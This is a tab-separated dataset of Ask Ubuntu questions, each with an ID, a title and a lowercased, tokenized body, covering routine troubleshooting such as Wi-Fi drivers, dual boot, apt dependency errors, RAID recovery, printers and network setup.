378819	wireless does not detect networks in 12.04	i have dell inspiron 3521 laptop , which comes with pre-installed ubuntu 12.04 . but wireless does not detect networks . here is some command which i have tried to know about my system lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 05 serial : 74:86:7a:23:72:8a size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=10.154.4.5 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:44 ioport:2000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0500000-c057ffff memory : afb00000-afb0ffff
378823	installed ubuntu with windows 7	i had windows 7 and installed ubuntu using the windows installer . now when i restart the pc , it directly boots to ubuntu . what happened to my windows 7 and how i can make it dual boot ?
378828	how to use wifi connection on nexus 4 ?	i installed ubuntu on my nexus 4 for development , and after the installation , i wanted to connect it to my wifi network . but , i ca n't add wifi settings because i can only check the box `` auto-join previous networks '' . so , either i misunderstand how the wifi settings work , or i have a real problem with my wifi settings .
378836	install older version of php with apt-get	i am trying to install an older version of php on my system . i installed ubuntu 12.04.3 and have tried sudo apt-get install php this does successfully install php 5.3.10-1ubuntu3.8 , however i trying to get 5.3.6-13ubuntu3.1 installed . can someone point me in the right direction ? i have no objection to using something like synaptic , i was able to find the .deb files here at security.ubuntu.com but it seems to require a huge amount of dependencies . is there a way to install the version of php i want with apt-get ? i am open to trying stuff , this is done on a vm and i have taken a snapshot so it can be restored back to its previous state .
378838	connecting two computers together : assigning ip doesnt work	i messed up . i have two network cards in one machine and one in the second . i tried to connect two computers together by setting a static ip on two machines like this : comp1 : sudo ip ad add 10.0.0.10/24 dev eth1 comp2 : sudo ip ad add 10.0.0.20/24 dev eth0 where eth0 on comp1 was an outside line with ip 192.168.132.100 after i rebooted the comp1 i lost network connection and i can not see the other computer comp2 . can someone give some advice on how to set this up ? update : let start from the begining : two computers comp1 and comp2 comp1 - > two network cards eth0 and eth1 eth0 is an outside connection : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp its ip is 10.140.20.20 eth1 is for cross computer connection : auto eth1 iface eth1 inet static address 10.10.0.0 netmask 255.255.255.0 gateway 10.140.20.20 dns-nameservers 10.140.20.20 comp2 : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.10.0.1 netmask 255.255.255.0 gateway 10.140.20.20 dns-nameservers 10.140.20.20 i know that tis is not working but could someone pleas explain why . i had some experience with this but years ago but it looks like i 'm a newbe update2 : since for some reason i can not add any more comments below you answers i am just add my progress here . so i changed everything as you gusy suggested and now i can see comp1 from comp2 and comp2 from comp1 and i can see net from comp1 but what i can not see is the net from comp2 i have enabled ipv4 forwarding but i believe there is a problem with my setup : comp1 : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.10.0.10 netmask 255.255.255.0 comp2 auto eth0 iface eth0 inet static address 10.10.0.20 netmask 255.255.255.0 gateway 10.10.0.10 so i think there needs to be a connection form eth1 to eth0 on my comp1 but i do n't know how to set it up . do i need to have static ip on eth0 ( comp1 ) ? when i add : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.10.0.10 netmask 255.255.255.0 up/sbin/iptables -t nat -a postrouting -s 10.0.0.0/24 -d 0/0 -j masquerade i can access outside network but when i try to download something to comp2 like geany sudo aptitude install geany i get err http : // ... . temporary faliour rsulting security.ubuntu.com
378841	upgrading ubuntu server to a recent version would update php too ? this result in any problems ?	i use ubuntu server 10.04 and php 5.3.2 , if i upgrade the server to a more recent version , the php would update too ? would this process result in some problem in the settings of php , like previously installed extensions ?
378842	what command is run when i select `` extract archive here ... '' in kubuntu ?	when i right click an archive in kubuntu 13.10 and select the extract option , not much happens . the taskbar launcher twirls around for a few seconds but nothing actually extracts . i suspect something is blowing up but there 's no terminal output to try and work out what 's going on . i 'd like to run the command that kde is running manually so i can see what 's wrong , and hopefully fix it . but where are the right-click options stored ? where can i find the command that kde 's trying to run ?
378843	how to share a cluster with a virtualization tool on lan ?	is there any way to share computer runtime between different clients where each client is able to run their desktop environment session in-depended to others ? i guess this is called virtualization but i need more particular know-how .
378848	stopping e-calendar-factory and e-addressbook-factory	how can i prevent e-calendar-factory and e-addressbook-factory from ever starting ? if i manually kill the processes they just start up again ? between the two they are spamming google with 100 packets/second . i believe both these processes belong to evolution . i 'm running 12.04 i 've had a slow network connection on only this computer and these processes are definitely the cause . whenever my internet becomes unusable i find these processes have started up again . manually killing them fixes it .
378850	pygame.error : file is not a windows bmp file	i am trying to learn pygame reading making games with pygame and python . i have ubuntu 13.04 , python 3.3 , and pygame 1.9.2 . i can only load bmp images in pygame . research into this has shown me that i am missing the proper sdl files to handle file formats other than bmp . how can i make it so that pygame can handle different picture formats ? thanks , joe
378853	configure dhcp server in ubuntu 13.10 and other version ?	salam ( hi ) what is the difference between install / configure dhcp-server in ubuntu 13.10 and other versions ? i see a video about configure dhcp-server in ubuntu 12 but i ca n't configure it in ubuntu 13.10 .
378854	how to make a shortcut to set title in gnome-terminal tab ( ubuntu 13.10 ) ?	i remember that in gnome-terminal there used be an option to set shortcuts in edit menu . i 've upgraded to ubuntu 13.10 and installed gnome3 and i have tried to make shortcuts for gnome-terminal , specially to set a title for a tab in terminal . so how can i do that ?
378858	ubuntu does n't mount my disk on key ?	i have a disk , it worked well but suddenly after formatting it to fat32 using windows , connecting it to my linux does n't mount it , what should i do ? this is the output of lsusb : $ ls usb bus 002 device 003 : id 0a5c:21d7 broadcom corp. bcm43142 bluetooth 4.0 bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0c45:6449 microdia bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 003 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 090c:1000 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) flash drive bus 003 device 002 : id 046d : c52f logitech , inc. unifying receiver bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub mounting : mount : special device /dev/sdb1 does not exist $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 698.7g 0 disk ├─sda1 8:1 0 690.8g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 7.9g 0 part [ swap ] sdc 8:32 1 59.6g 0 disk sr0 11:0 1 1024m 0 rom
378864	configuring splash screen to fully cover the boot	i 'm trying to set the splash screens for the whole boot , from the selection in grub until de fully loads . my de is xfce 4.10 , running xubuntu 13.10 . now , i have the default plymounth xubuntu theme , which works good , except that it takes ~3-5sec to show since grub starts to load ubuntu ( there is a blank screen for that period ) , after the plymounth splash , there is a ~2-3sec blank screen again , then ( i have autologin ) the xfce splash screen appears but only for ~1-2sec and the the xfce continue to boot . during that xfce boot the desktop has no wallpaper , nor the theme is applied so it looks ugly . it would be nice to have the xfce splash appered right after the plymounth splash and have it visible for the whole de boot ( or at least until the wallpaper and theme load ) if i remember correctly , kde works like this , it has its splash screen which is shown until kde boots . also , there should be a splash screen when shutting down the system but that screen only appears for ~1sec and then it switch to text mode until the system is shutted down . any idea of how to solve this ?
378867	is their a toggl command line interface	i am looking for an application to handle toggl ( https : //www.toggl.com/track # ) commands . for instance one could write a bash script that starts and/or stops a task in toggl . searching the web did n't result in any package ... is their a package/repository available ? a use case : i work on a project so i write a script that first starts the project on toggle , then the ide is started . when the user closes the ide , the script is activated again and the task is turned of on toggl .
378869	how to remove a service that not be enabled after reboot ?	i want to remove unnecessary services in ubuntu server 13.04 for hardening purpose . i do n't know use which blow command for dedicate services : 1. inintct list 2. sysv-rc-conf list 3. ls /etc/init.d 4. service -- status-all why outputs of each above command are different ? i tried stop atd service with `` service atd stop '' , but after reboot system this service start again . since i want hardening my server , how to disable a service permanently ? and which services should be disable ? thanks .
378872	ubuntu server can not boot - hdd problems	i have major problem , my ubuntu server wo n't start up after reboot , guys in hetzner datacenter started recsue sistem up and found out this on sda : -- -- -- -- -- -- -- -- - % < -- -- -- -- -- -- -- -- - 5 reallocated_sector_ct 0x0033 001 001 036 pre-fail always failing_now 4095 -- -- -- -- -- -- -- -- - % < -- -- -- -- -- -- -- -- - there are 3 x 1.5tb hdds in raid5 and on sda there was boot loader . they insisted to replace sda with new hdd , so i confirmed . after that they mailed me back with another thing , sdc is also corrupted ... until 7:30 this morning everything worked fine . after that server has been frozen , and after reboot two hdd-s are corrupted ... little bit weird , but no time to think about that . they returned corrupted sda back , so `` that i can restore some data ... '' but the problem is i was stuck . i tried to mount sdb while in live-rescue-system and to install grub , but there is this error : root @ rescue ~ # grub-install /dev/sdb /usr/sbin/grub-probe : error : can not find a device for /boot/grub ( is /dev mounted ? ) . root @ rescue ~ # mkdir /media/sdb root @ rescue ~ # mount /dev/sdb /media/sdb mount : you must specify the filesystem type root @ rescue ~ # mount /dev/sdb /media/sdb -t auto mount : you must specify the filesystem type root @ rescue ~ # mount /dev/sdb /media/sdb -t ext3 mount : wrong fs type , bad option , bad superblock on /dev/sdb , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so can someone please help me to try and start ubuntu server or to somehow restore data from any of disks ... extra info : root @ rescue ~ # ll /dev/sd brw-rw -- -t 1 root disk 8 , 0 nov 18 14:04 /dev/sda brw-rw -- -t 1 root disk 8 , 1 nov 18 14:06 /dev/sda1 brw-rw -- -t 1 root disk 8 , 2 nov 18 14:06 /dev/sda2 brw-rw -- -t 1 root disk 8 , 16 nov 18 14:04 /dev/sdb brw-rw -- -t 1 root disk 8 , 17 nov 18 14:04 /dev/sdb1 brw-rw -- -t 1 root disk 8 , 18 nov 18 14:04 /dev/sdb2 brw-rw -- -t 1 root disk 8 , 32 nov 18 14:06 /dev/sdc root @ rescue ~ # df -h filesystem size used avail use % mounted on rootfs 12g 3.0m 12g 1 % / udev 12g 0 12g 0 % /dev 188.40.24.212 : /nfs 1.4t 592g 722g 46 % /root/.oldroot/nfs aufs 12g 3.0m 12g 1 % / tmpfs 2.4g 264k 2.4g 1 % /run tmpfs 5.0m 0 5.0m 0 % /run/lock tmpfs 4.8g 0 4.8g 0 % /run/shm root @ rescue ~ # ll /dev/loo* brw-rw -- -t 1 root disk 7 , 0 nov 18 14:04 /dev/loop0 brw-rw -- -t 1 root disk 7 , 1 nov 18 14:04 /dev/loop1 brw-rw -- -t 1 root disk 7 , 2 nov 18 14:04 /dev/loop2 brw-rw -- -t 1 root disk 7 , 3 nov 18 14:04 /dev/loop3 brw-rw -- -t 1 root disk 7 , 4 nov 18 14:04 /dev/loop4 brw-rw -- -t 1 root disk 7 , 5 nov 18 14:04 /dev/loop5 brw-rw -- -t 1 root disk 7 , 6 nov 18 14:04 /dev/loop6 brw-rw -- -t 1 root disk 7 , 7 nov 18 14:04 /dev/loop7 crw -- -- -- t 1 root root 10 , 237 nov 18 14:04 /dev/loop-control root @ rescue ~ # fdisk -l disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000cdbda device boot start end blocks id system /dev/sdb1 3906 1060289 528192 fd linux raid autodetect /dev/sdb2 1060290 2930272064 1464605887+ fd linux raid autodetect disk /dev/sda : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c5b77 device boot start end blocks id system /dev/sda1 3906 1060289 528192 fd linux raid autodetect /dev/sda2 1060290 2930272064 1464605887+ fd linux raid autodetect disk /dev/md0 : 540 mb , 540803072 bytes 2 heads , 4 sectors/track , 132032 cylinders , total 1056256 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table root @ rescue ~ # cat /proc/mdstat personalities : [ raid1 ] md1 : inactive sda2 [ 0 ] ( s ) 1464605760 blocks md0 : active raid1 sda1 [ 0 ] 528128 blocks [ 3/1 ] [ u__ ] unused devices : < none >
378873	ca n't print any more `` stopped - filter failed ''	i have a hp deskjet 940c . it had always worked . a few days ago it has suddenly stopped working . even after reboot , its status ( `` printer state '' ) always shows `` stopped - filter failed '' and every time i try to print the job remains `` pending '' forever . i have rebooted several times . is there any known fix/workaround ?
378883	problem with package installation - linux-image-server	i know similar issues have been resolved , but i 'm kind of stuck . i ran out of space on / partition and needed to remove some packages since apt-get remove , autoremove and clean were not able to do anything . i then apt-get update and apt-get upgrade-ed , but something went wrong in the process . now , the situtation is : apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-headers-server linux-server the following packages will be upgraded : linux-headers-server linux-server 2 upgraded , 0 newly installed , 0 to remove and 56 not upgraded . 2 not fully installed or removed . need to get 0 b/3,996 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-headers-server : linux-headers-server depends on linux-headers-3.2.0-55-generic ; however : package linux-headers-3.2.0-55-generic is not installed . dpkg : error processing linux-headers-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.55.65 ) ; however : version of linux-image-server on system is 3.2.0.56.66. linux-server depends on linux-headers-server ( = 3.2.0.55.65 ) ; however : package linux-headers-server is not configured yet . dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-headers-server linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so the system wants to install linux-image-server=3.2.0.56.66 though other components depend on version 3.2.0.55.65 . i tried to dpgk -- remove the package and then reinstall , but i 'm stuck . from what i understand , i would need to downgrade linux-image-server , then fix dependencies , than optionally upgrade , if it is needed ?
378886	503 not enough disk space ( only one partition )	i have just installed ubuntu 13.10 gnome ( saucy desktop ) on my laptop ( only ubuntu no windows ) . while installing any software using apt ( sudo apt-get install rhythmboc ) i am getting 503 space error . i have a total of 2 partition one for ubuntu and one for linux swap . disk image : home folder usage and disk partition photo user usage df -h gives filesystem size used avail use % mounted on /dev/sda1 455g 4.3g 428g 1 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.9g 12k 1.9g 1 % /dev tmpfs 382m 1.2m 381m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 184k 1.9g 1 % /run/shm none 100m 60k 100m 1 % /run/user and cat /etc/fstab gives # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=831cdab3-d6ba-40dd-95cf-ddbbb60a567b / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=9951ab0d-8093-4814-a732-bfca3817597a none swap sw 0 0 how should i fix this to avoid it in future ? if i have to re install ubuntu what should i do to avoid it ?
378889	installing canon pixma mx395 printer drivers on ubuntu	how can i get ubuntu drivers for canon pixma mx395 printer & fax ? i 'm lost here . i 've tired a few things , but nothing is working . i need help !
378890	retaining packages while upgrading	how can i retain installed package from a previous version of ubuntu after upgrading that only the packages are retained and i do n't have to download and install them again ? or can i make a installer out of installed packages ? all i want to know that can i save my data plan .
378891	fresh ubuntu install , problems with existing partitions	i wish to install ubuntu 12.04 lts with a clean install . i have windows xp and ubuntu 13.04 already installed along with some files , movies on other drive . now , i want to erase everything , deleting all sorts of files there and then install ubuntu 12.04 completely fresh . now , my current system has 5 drives with different sizes . while selecting , 'erasing disk and re-install ' the next screen shows , ' the entire disk will be used ' . i tried to create/change partitions but got confused there ... should i delete already existing partitions and create new ones or just re-size them ?
378892	where are iptables 's rulesets stored on ubuntu 12.04 ?	ubuntu 12.04 lts - iptables v1.4.12 tldr : where are iptables 's rulesets saved when invoking iptables-save < ruleset-name > ? explanation : according to this answer basic way of saving iptables 's rules is invoking iptables-save > /etc/iptables/rules.v4 ip6tables-save > /etc/iptables/rules.v6 and afterwards loading/restoring these rules in /etc/network/interfaces like : iface eth0 inet static ... . pre-up iptables-restore < /etc/iptables/rules.v4 pre-up ip6tables-restore < /etc/iptables/rules.v6 ... or putting these into a shell script in /etc/network/if-pre-up.d . this can be simplified by installing the iptables-persistent package . sudo apt-get install iptables-persistent inovoke-rc.d iptables-persistent save update-rc.d iptables-persistent defaults following some tutorials i tried to invoke service iptables status ( a non-existant/unknown command for the iptables version/package that comes pre-installed with 12.04 ) and found this interesting output : aborting iptables initd : unknown command ( s ) : `` status '' . ... save < ruleset > save the current ruleset load < ruleset > load a ruleset ... saved rulesets : active , inactive ... there seem to be two rulesets i can load ( active and inactive ) ... .. but where are these stored ? i ca n't find their location as active/inactive are pretty bad search terms and dpkg-query -l iptables does n't help either . as i 'm provisioning my servers with puppet/chef it would be nice to know wether there is some place i can put my rulesets and add a simple shell script to /etc/networking/if-pre-up to load these . then i could ommit the iptables-persistent package which ai n't that flexible as it does n't allow loading different rulesets . thanks for your help .
378893	how can i prevent supervisor to run at startup ?	i 'm using the very useful supervisor . but i 'd like to prevent it from running when i start ubuntu : is it possible ?
378894	what 's the matter with my dual system load ?	i just installed ubuntu 12.04.i know what i did , that is i divided the drive considering a dual system load.but , no grub stripes lighten up as booting , that means i ca n't selected which system i wan na go , then , i directly go onto ubuntu . ps : the other system is win8 , i do n't think it would matter .
378897	network printer installation problem	i 'm trying to install a network printer in xubuntu 13.10 . when running the installer , after i select my printer and chose to use a local driver it 's stays there without doing anything . also the using gutenprint option gives no result , it 's just stays there with an installing driver box . the only clue i have is this dmesg output . [ 42.332166 ] type=1400 audit ( 1384783390.184:47 ) : apparmor= '' denied '' operation= '' capable '' parent=1855 profile= '' /usr/sbin/cupsd '' pid=1862 comm= '' serial '' pid=1862 comm= '' serial '' capability=21 capname= '' sys_admin '' i do n't know if it 's a gui installer problem . in that case , could i install it via command line ?
378902	error while installing shutter on unbuntu 12.04 !	i typed sudo apt-get install shutter on the terminal . i got the following error . please help me how to fix this ? shutter : depends : gnome-web-photo but it is not installable depends : libgnome2-perl but it is not installable depends : libgnome2-vfs-perl but it is not installable depends : libgnome2-wnck-perl but it is not installable depends : libgoo-canvas-perl but it is not installable depends : libgtk2-imageview-perl but it is not installable depends : libgtk2-trayicon-perl but it is not installable depends : libgtk2-unique-perl but it is not installable depends : libnet-dbus-perl but it is not installable depends : libproc-processtable-perl but it is not installable depends : libwww-mechanize-perl but it is not installable depends : libx11-protocol-perl but it is not installable depends : libxml-simple-perl but it is not installable depends : perlmagick but it is not installable depends : libpath-class-perl but it is not installable depends : libjson-perl but it is not installable depends : libjson-xs-perl but it is not installable depends : libnet-dropbox-api-perl but it is not installable depends : libfile-which-perl but it is not installable depends : libproc-simple-perl but it is not installable depends : libsort-naturally-perl but it is not installable e : unable to correct problems , you have held broken packages .
378911	compile and run android apps from the console	i installed eclipse and all the sdk/jre etc ... i can make android apps now and it 's working , but often my eclipse crash . i would like to know if it 's possible to : compile build run from the command line ? i use vim to edit the files
378914	is there a psp ( playstation portable ) theme creator for ubuntu ?	i like to craete themes for my psp.i used to create themes for psp from windows 7.is there a psp theme creator for ubuntu
378917	script for checking health on disks	i want to use hdsentinel to auto check the health of my disks . i have a larger script that this is going to be included in . so here 's my problem : if i run ./hdsentinel -solid | grep 953870 | awk ' { print $ 1 , $ 3 } ' i 'll get the following output : /dev/sda 100 /dev/sdb 100 /dev/sdc 100 /dev/sdd 100 /dev/sde 100 /dev/sdf 100 this says that all my disks are at 100 % health . but i want to print to a file what disk ( s ) are under 100 % with the following command : ./hdsentinel -aam | grep -a13 /dev/diskid > > file it des n't need to be the grep command here but you the idea is the same .
378918	stuck in an update , how to get to where i was ?	i 'm using the console to do an upgrade . and before finishing , the console told me that it was going to update a specific file , and that i could go and update it , keep the old one , or press d to know what were the changes . i 've pressed d , and now i do n't know how to get out of that window , and continue with the update . i 've tried all fs ( f1 to f12 ) , esc , enter , backspace , tab , etc . what should i do ? thanks for your help !
378919	can not load ubuntu 12.10 after upgrade	i upgraded from 12.04 to 12.10 last night . it all seem to be okay , asked me to restart my computer . the ubuntu splash screen displayed and then the computer seemed to do dormant . i thought it was part of it deleting some of the packages . after leaving it an hour , in that state , i rebooted it and the same thing the splash screen displayed as if to load and then the display went into standby and no desktop showed . i used disk boot repair and it told me to reboot , still the same but generated http : //paste.ubuntu.com/6437705/ . a bit lost now , only been using ubuntu a few weeks so do not have much knowledge of terminal etc . please help before i lose interest in ubuntu .
378920	will juju support start/stop of existing units ?	currently it seems that juju is not able to start / stop existing units . say i have a very large application that takes some time to push up a new machine , i would likely want to scale up machines in advance and then only bring them up when needed . currently add-unit adds new units . is it likely juju will be extended to allow to provision units in advance and then when scaling up , use those units instead of creating totally new servers ? cloud servers often cost money when running - thus it seems that this would make sense to be able to just stop/start instead of only add/remove .
378925	aleks plug-in on 12.04	i 'm running 12.04 and have successfully installed the latest version of jdk . i 've followed the instructions on this page to install the plug-in for aleks , and that worked . but when i log in to aleks and try to access my class , aleks still wo n't run , even though i 've installed the plug-in and am running the right version of java . any thoughts ? thanks ! : )
378929	linux alternative to windows task scheduler or another way of doing it	does linux have an alternative to windows task scheduler , another way like a script or an inbuilt function ?
378932	how to always use rgrep with color	replace grep command with grep -n -- colour ? is there anything similar for rgrep auto color ?
378935	what is the command for compiling a 32-bit binary in ubuntu 13.10 ?	i am trying to compile my program . normally i just put the command gcc example.c -o example . so this compiles the .run file into 64-bit . but i want it as 32-bit . what is the command ? i have installed g++-multilib .
378937	closing laptop lid issue	i boot up ubuntu , and log in . i close my laptop lid , it goes into suspend ( this is what i want ) i open it up , and log back in , fan turns off ( not sure why ) i try to close it again , but no suspend after about a minute , fan comes on full blast the laptop stays this way , full fan , and unable to suspend when closing the lid until i reboot . i 'm using a toshiba satellite l505d-s5965 , and have ubuntu 13.10 64bit installed . i also tried this with the 32 bit version of 12.04lte please help
378942	android virtual device with intel x86 system image hangs	i am trying to start android virtual device with intel x86 system image . but its doesnt even show the 'android ' which avd 's usually show while loading up . my arm based avd 's are running as expected . i have installed 'sudo apt-get install qemu-kvm libvirt-bin ubuntu-vm-builder bridge-utils' i followed the steps mentioned as per intel 's hardware-assisted virtualization ( hypervisor ) on linux document and have confirmed that my processor is compatible with haxm . at present i am not passing any parameter to the intel avd as it hangs even when i pass them . i see one of the processor core reaching to 100 % usage . i am not able to terminate the avd window as well . the only way to get rid of this is to reboot ubuntu . what am i missing here . i am on ubuntu 13.10 using intel i5 3317u .
378944	can not load installer cd on acer aspire tc605 ( keep restarting )	i 've tried installing windows xp with no problem . i 'm going to install lubuntu 13.10 when boot lubuntu 13.10 cd , computer keep reboot and stuck in reboot loop . it looks like the computer reboot once it read the cd contents . i 've lots of lubuntu release ( 10.10 , 11.04 , etc ) . i 've tried all them and the result are same
378945	ubuntu ( only ) installed : can not boot to reinstall	i am a first time ubuntu user . in my computer ubuntu 12.04 lts was installed on a clean box , all hardware is brand new . intel 64bit , ssd . no windows installed . after a few hours using ubuntu , applications did not appear in the software center so i spent hours trying to uninstall/install using instructions found here . i found a work-around and successfully installed a few programs . more problems started occurring so i thought i 'd try to reinstall ubuntu to start from the beginning when everything worked . **at this point ubuntu was working ( i was using firefox , downloading email , etc . ) until i tried to restart the computer . i began the process to reinstall ubuntu . the machine would not boot from the usb pendrive used for the original install so i started again with a different pendrive . i downloaded the universal installer , installed the iso on the pendrive and tried to boot from the new pendrive with the same results . when i turn on the machine i briefly see a blank purple screen and then these lines appear : [ 2.743827 ] sd 6:0:0:0 [ sdb ] no caching mode page found [ 2.743848 ] sd 6:0:0:0 [ sdb ] assuming drive cache : write through [ 2.744870 ] sd 6:0:0:0 [ sdb ] no caching mode page found [ 2.744891 ] sd 6:0:0:0 [ sdb ] assuming drive cache : write through [ 2.746358 ] sd 6:0:0:0 [ sdb ] no caching mode page found [ 2.746379 ] sd 6:0:0:0 [ sdb ] assuming drive cache : write through and it just hangs there . can anyone either direct me to already-posted answers or help me work through this ? i am completely a ubuntu novice , but i know just enough to have gotten myself into this predicament .
378950	system trashed after recommended ubuntu updates- what do i do ?	everything running fine when ubuntu messaged me it had a large number of updates to install . i gave it root access and ran the updates , then rebooted . now the system will no longer boot ! when i start the system i get a message : > ! the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . > the mouse works and i click ok , then i get a menu with 4 options : run in low-graphics mode for just one session - this sticks at 'stopping system v runlevel compatibility , blinking cursor goes nowhere . 'could not write bytes : broken pipe '' reconfigure graphics - all options off this menu go nowhere troubleshoot the error - this just brings up log files exit to console login - this also stops at 'could not write bytes : broken pipe ' , etc . goes nowhere . i am not really savvy with ubuntu , just use it for my os . has anyone had this happen ? is there any way to remove these updates ? ? i had no problems with the system before they loaded today : ( thanks- jeffpas ubuntu with linux 3.5.0-43-generic dobey- i click `` add comment '' and nothing happens , i ca n't seem to reply to your question . i have not done anything with the nvidia drivers , i 'm using what came with the ubuntu install for this version . why would they become an issue now ? is there some way to fix this ? i 've tried booting in recovery mode , and it sticks at 'stopping save kernel messages ' and a cursor , and goes nowhere . thanks avinash- thanks i 'll remember that- but i found out the problem . my root filesystem / was at 100 % full . i got out to a prompt and deleted some files , and the system booted and i can get in now everything appears ok . strange , that it did n't just say that , the message was pretty misleading . whew !
378952	transmission use the same torrents in two ubuntu profiles	i use transmission for torrents download . but i have two profiles in ubuntu ( one for me , and another for my parents ) . is there a way two transmission use `` common '' torrents . so if i added a torrent in one transmission , it will be added in the other two ( i use difference folders for download , like music , distros , etc ) and transmission knows it is downloaded ?
378954	what i can do to load ubuntu ?	i 've installed ubuntu 12.04 from windows 8.1 previous the intstallation i have dual boot : windows and linux mint . from windows i installed ubuntu 12.04 the program saw that was linux mint installed , and ask to uninstalled , i click ok and then download something and said installing ubuntu . after this ask to me to boot and give me the choice between ubuntu and windows . when i choose ubuntu , it is no loading like always and appear a box like this . busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) what i can do to load ubuntu ? i am really new in ubuntu , my knowledge is the big thing , aber i will like that someone help me .
378957	change default ntfs-3g drivers to commercial paragon ntfs drivers ( set as default )	i am using ubuntu 12.04 lts-32 bit , kernel 3.2.0.52 default ntfs-3g drivers are slow in r/w mode and i installed paragon ntfs drivers for linux . they worked like charm and i got read write speed = windows ntfs . but the problem is that , i need to mount them as root or in /etc/fstab . if a partition is not mentioned in /etc/fstab entry , then in nautilus file browser , if click on left pane device list , it mounts with ntfs-3g drivers . i also uninstalled ntfs-3g drivers so that paragon ntfs drivers will take over but then native linux read only ntfs drivers came in place . i am a noob and do n't know what to do , i did n't find any tutorial and please tell me how to shift from default drivers to these commercial one . i also want same file permission just like ntfs-3g ( mount read write and unmount by any user ) thanks for help .
378958	how to change my notification tooltip theme ?	after installing lxde to my ubuntu 13.10 system , the notifications tooltip theme changed and it remains after uninstalling lxde . also before that , pressing fn + arrow keys in my laptop i could change the volume and brightness settings and a tooltip would show up indicating the current levels , but now that does n't show anymore .
378959	keyboard layout changes after reboot	each time i reboot my system , the keyboard layout is falling back to us layout even though i want it to be in french layout . this is my default value and this is also the one that is ticked in the keyboard layout menu from the tray . i just need to click once again on the french icon for the layout to get it to work properly but this is quite annoying . did someone have the same problem and found a solution ? it is apparently a non-unique case since there is already a bug report for this ( see this bug report ) . i am using ubuntu 13.10 .
378961	most options are disabled/greyed-out in gimp	i 'm attempting to resize an image and save the resizes image . google taught me that i should be looking for the scale image option , however it 's disabled along with save image , export image and most options . i then attempted to look into this everything says i need to set the mode to rgb , but it 's already on rbg . what 's gone wrong ?
378964	ethernet card does n't work after installing ubuntu 13.04	i have an old dell inspiron notebook that has marvell ethernet card ( [ 11ab:4354 ] ( rev 13 ) ) recently i installed an ubuntu 13.04 on this notebook and then i saw that eth conn. can not establish also i tried unloading sky2 module from kernel and reloading it but it does n't work again and i tried setting the network properties manually by ifconfig and /etc/network/interfaces but it did n't work so ... also the wi-fi driver is not installed but i know what package i need for wi-fi driver therefor i need a way to run eth conn on this system and then install the wi-fi driver
378965	htpasswd executable is missing	i 'm running 13.10 . clean install . ran : sudo apt-get install apache2 i would expect that i would have htpasswd in the /usr/sbin directory along with the apache2 executable . i do n't . i can provide any info necessary .
